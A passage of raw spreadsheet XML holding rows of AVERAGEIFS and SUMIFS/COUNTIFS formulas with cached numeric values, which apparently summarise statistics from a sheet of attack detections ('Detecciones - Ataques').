        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DF$3:$DF$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AK$131)
</f>
        <v>1.5</v>
      </c>
      <c r="AL153" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DF$3:$DF$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AL$131)
</f>
        <v>0</v>
      </c>
      <c r="AM153" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DF$3:$DF$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AM$131)
</f>
        <v>0.004526034314</v>
      </c>
      <c r="AN153" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AO153" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AP153" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AQ153" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DF$3:$DF$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AQ$131)
</f>
        <v>0.3710526316</v>
      </c>
      <c r="AR153" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DF$3:$DF$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AR$131)
</f>
        <v>1.166666667</v>
      </c>
      <c r="AS153" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AT153" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DF$3:$DF$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AT$131)
</f>
        <v>3</v>
      </c>
      <c r="AU153" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DF$3:$DF$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AU$131)
</f>
        <v>3.5</v>
      </c>
      <c r="AV153" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DF$3:$DF$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AV$131)
</f>
        <v>2</v>
      </c>
      <c r="AW153" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AX153" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DF$3:$DF$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AX$131)
</f>
        <v>1.625</v>
      </c>
      <c r="AY153" s="534" t="s">
        <v>12</v>
      </c>
      <c r="AZ153" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DF$3:$DF$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AZ$131)
</f>
        <v>0.5</v>
      </c>
      <c r="BA153" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DF$3:$DF$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BA$131)
</f>
        <v>13</v>
      </c>
      <c r="BB153" s="534" t="s">
        <v>12</v>
      </c>
      <c r="BC153" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DF$3:$DF$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BC$131)
</f>
        <v>0.3333333333</v>
      </c>
      <c r="BD153" s="533" t="s">
        <v>12</v>
      </c>
      <c r="BE153" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DF$3:$DF$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BE$131)
</f>
        <v>0</v>
      </c>
      <c r="BF153" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DF$3:$DF$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BF$131)
</f>
        <v>0</v>
      </c>
      <c r="BG153" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DF$3:$DF$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BG$131)
</f>
        <v>0</v>
      </c>
      <c r="BH153" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DF$3:$DF$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BH$131)
</f>
        <v>396</v>
      </c>
      <c r="BI153" s="533" t="s">
        <v>12</v>
      </c>
      <c r="BJ153" s="533" t="s">
        <v>12</v>
      </c>
      <c r="BK153" s="533" t="s">
        <v>12</v>
      </c>
      <c r="BL153" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DF$3:$DF$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BL$131)
</f>
        <v>1</v>
      </c>
      <c r="BM153" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DF$3:$DF$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BM$131)
</f>
        <v>14977.05935</v>
      </c>
      <c r="BN153" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DF$3:$DF$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BN$131)
</f>
        <v>1060.391166</v>
      </c>
      <c r="BO153" s="533" t="s">
        <v>12</v>
      </c>
      <c r="BP153" s="533" t="s">
        <v>12</v>
      </c>
      <c r="BQ153" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DF$3:$DF$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BQ$131)
</f>
        <v>0</v>
      </c>
      <c r="BR153" s="533" t="s">
        <v>12</v>
      </c>
      <c r="BS153" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DF$3:$DF$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BS$131)
</f>
        <v>4.5</v>
      </c>
      <c r="BT153" s="533" t="s">
        <v>12</v>
      </c>
      <c r="BU153" s="533" t="s">
        <v>12</v>
      </c>
      <c r="BV153" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DF$3:$DF$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BV$131)
</f>
        <v>0</v>
      </c>
      <c r="BW153" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DF$3:$DF$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BW$131)
</f>
        <v>4</v>
      </c>
      <c r="BX153" s="533" t="s">
        <v>12</v>
      </c>
      <c r="BY153" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DF$3:$DF$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BY$131)
</f>
        <v>0.0625</v>
      </c>
      <c r="BZ153" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DF$3:$DF$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BZ$131)
</f>
        <v>0.08130081301</v>
      </c>
      <c r="CA153" s="534" t="s">
        <v>12</v>
      </c>
      <c r="CB153" s="533" t="s">
        <v>12</v>
      </c>
      <c r="CC153" s="534" t="s">
        <v>12</v>
      </c>
      <c r="CD153" s="533" t="s">
        <v>12</v>
      </c>
      <c r="CE153" s="533" t="s">
        <v>12</v>
      </c>
      <c r="CF153" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DF$3:$DF$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CF$131)
</f>
        <v>3</v>
      </c>
      <c r="CG153" s="533" t="s">
        <v>12</v>
      </c>
      <c r="CH153" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DF$3:$DF$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CH$131)
</f>
        <v>1</v>
      </c>
      <c r="CI153" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DF$3:$DF$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CI$131)
</f>
        <v>0</v>
      </c>
      <c r="CJ153" s="533" t="s">
        <v>12</v>
      </c>
      <c r="CK153" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DF$3:$DF$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CK$131)
</f>
        <v>13</v>
      </c>
      <c r="CL153" s="533" t="s">
        <v>12</v>
      </c>
      <c r="CM153" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DF$3:$DF$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CM$131)
</f>
        <v>81</v>
      </c>
      <c r="CN153" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DF$3:$DF$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CN$131)
</f>
        <v>0</v>
      </c>
      <c r="CO153" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DF$3:$DF$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CO$131)
</f>
        <v>2</v>
      </c>
      <c r="CP153" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DF$3:$DF$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CP$131)
</f>
        <v>20</v>
      </c>
      <c r="CQ153" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DF$3:$DF$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CQ$131)
</f>
        <v>3</v>
      </c>
      <c r="CR153" s="533" t="s">
        <v>12</v>
      </c>
      <c r="CS153" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DF$3:$DF$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CS$131)
</f>
        <v>0.06226183134</v>
      </c>
      <c r="CT153" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DF$3:$DF$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CT$131)
</f>
        <v>0.003992015968</v>
      </c>
      <c r="CU153" s="533" t="s">
        <v>12</v>
      </c>
      <c r="CV153" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DF$3:$DF$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CV$131)
</f>
        <v>0</v>
      </c>
      <c r="CW153" s="533" t="s">
        <v>12</v>
      </c>
      <c r="CX153" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DF$3:$DF$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CX$131)
</f>
        <v>4.5</v>
      </c>
      <c r="CY153" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DF$3:$DF$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CY$131)
</f>
        <v>16</v>
      </c>
      <c r="CZ153" s="533" t="s">
        <v>12</v>
      </c>
      <c r="DA153" s="533" t="s">
        <v>12</v>
      </c>
      <c r="DB153" s="533" t="s">
        <v>12</v>
      </c>
      <c r="DC153" s="533" t="s">
        <v>12</v>
      </c>
      <c r="DD153" s="533" t="s">
        <v>12</v>
      </c>
      <c r="DE153" s="533" t="s">
        <v>12</v>
      </c>
      <c r="DF153" s="533" t="s">
        <v>12</v>
      </c>
      <c r="DG153" s="533" t="s">
        <v>12</v>
      </c>
      <c r="DH153" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DF$3:$DF$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, DH$131)
</f>
        <v>1.053333333</v>
      </c>
      <c r="DI153" s="533" t="s">
        <v>12</v>
      </c>
      <c r="DJ153" s="519">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DF$3:$DF$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, DJ$131)
</f>
        <v>1.181818182</v>
      </c>
      <c r="DK153" s="271"/>
    </row>
    <row r="154">
      <c r="J154" s="277"/>
      <c r="K154" s="512"/>
      <c r="L154" s="512"/>
      <c r="M154" s="512"/>
      <c r="N154" s="512"/>
      <c r="O154" s="278"/>
      <c r="Q154" s="271"/>
      <c r="R154" s="352" t="s">
        <v>2576</v>
      </c>
      <c r="S154" s="501">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$EV$3:$EV$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, S$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$EV$3:$EV$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; S$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, S$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; S$131 &amp; "*"
    )
)
</f>
        <v>0.3820704466</v>
      </c>
      <c r="T154" s="501">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$EV$3:$EV$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, T$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$EV$3:$EV$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; T$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, T$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; T$131 &amp; "*"
    )
)
</f>
        <v>0.004526034314</v>
      </c>
      <c r="U154" s="501">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$EV$3:$EV$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, U$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$EV$3:$EV$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; U$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, U$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; U$131 &amp; "*"
    )
)
</f>
        <v>1.854824561</v>
      </c>
      <c r="V154" s="501">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$EV$3:$EV$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, V$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$EV$3:$EV$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; V$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, V$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; V$131 &amp; "*"
    )
)
</f>
        <v>4.671875</v>
      </c>
      <c r="W154" s="532">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$EV$3:$EV$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, W$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$EV$3:$EV$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; W$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, W$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; W$131 &amp; "*"
    )
)
</f>
        <v>14</v>
      </c>
      <c r="X154" s="501">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$EV$3:$EV$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, X$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$EV$3:$EV$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; X$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, X$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; X$131 &amp; "*"
    )
)
</f>
        <v>7065.428571</v>
      </c>
      <c r="Y154" s="501">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$EV$3:$EV$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, Y$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$EV$3:$EV$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; Y$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, Y$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; Y$131 &amp; "*"
    )
)
</f>
        <v>81.225</v>
      </c>
      <c r="Z154" s="501">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$EV$3:$EV$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, Z$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$EV$3:$EV$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; Z$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, Z$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; Z$131 &amp; "*"
    )
)
</f>
        <v>8583.301414</v>
      </c>
      <c r="AA154" s="501">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$EV$3:$EV$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, AA$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$EV$3:$EV$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; AA$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, AA$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; AA$131 &amp; "*"
    )
)
</f>
        <v>2.343169444</v>
      </c>
      <c r="AB154" s="501">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$EV$3:$EV$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, AB$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$EV$3:$EV$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; AB$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, AB$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; AB$131 &amp; "*"
    )
)
</f>
        <v>27.7109375</v>
      </c>
      <c r="AC154" s="501">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$EV$3:$EV$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, AC$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$EV$3:$EV$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; AC$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, AC$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; AC$131 &amp; "*"
    )
)
</f>
        <v>6.15</v>
      </c>
      <c r="AD154" s="501">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$EV$3:$EV$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, AD$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$EV$3:$EV$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; AD$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, AD$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; AD$131 &amp; "*"
    )
)
</f>
        <v>1.225706178</v>
      </c>
      <c r="AE154" s="501">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$EV$3:$EV$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, AE$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$EV$3:$EV$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; AE$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, AE$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; AE$131 &amp; "*"
    )
)
</f>
        <v>8.12</v>
      </c>
      <c r="AF154" s="502">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$EV$3:$EV$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, AF$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$EV$3:$EV$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; AF$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, AF$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; AF$131 &amp; "*"
    )
)
</f>
        <v>4.229356923</v>
      </c>
      <c r="AG154" s="271"/>
      <c r="AH154" s="352" t="s">
        <v>2576</v>
      </c>
      <c r="AI154" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$EV$3:$EV$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AI$131)
</f>
        <v>0.1808075599</v>
      </c>
      <c r="AJ154" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$EV$3:$EV$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AJ$131)
</f>
        <v>0</v>
      </c>
      <c r="AK154" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$EV$3:$EV$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AK$131)
</f>
        <v>1.75</v>
      </c>
      <c r="AL154" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$EV$3:$EV$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AL$131)
</f>
        <v>0</v>
      </c>
      <c r="AM154" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$EV$3:$EV$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AM$131)
</f>
        <v>0.004526034314</v>
      </c>
      <c r="AN154" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AO154" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AP154" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AQ154" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$EV$3:$EV$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AQ$131)
</f>
        <v>0.5763157895</v>
      </c>
      <c r="AR154" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$EV$3:$EV$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AR$131)
</f>
        <v>1.833333333</v>
      </c>
      <c r="AS154" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AT154" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$EV$3:$EV$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AT$131)
</f>
        <v>4</v>
      </c>
      <c r="AU154" s="518">
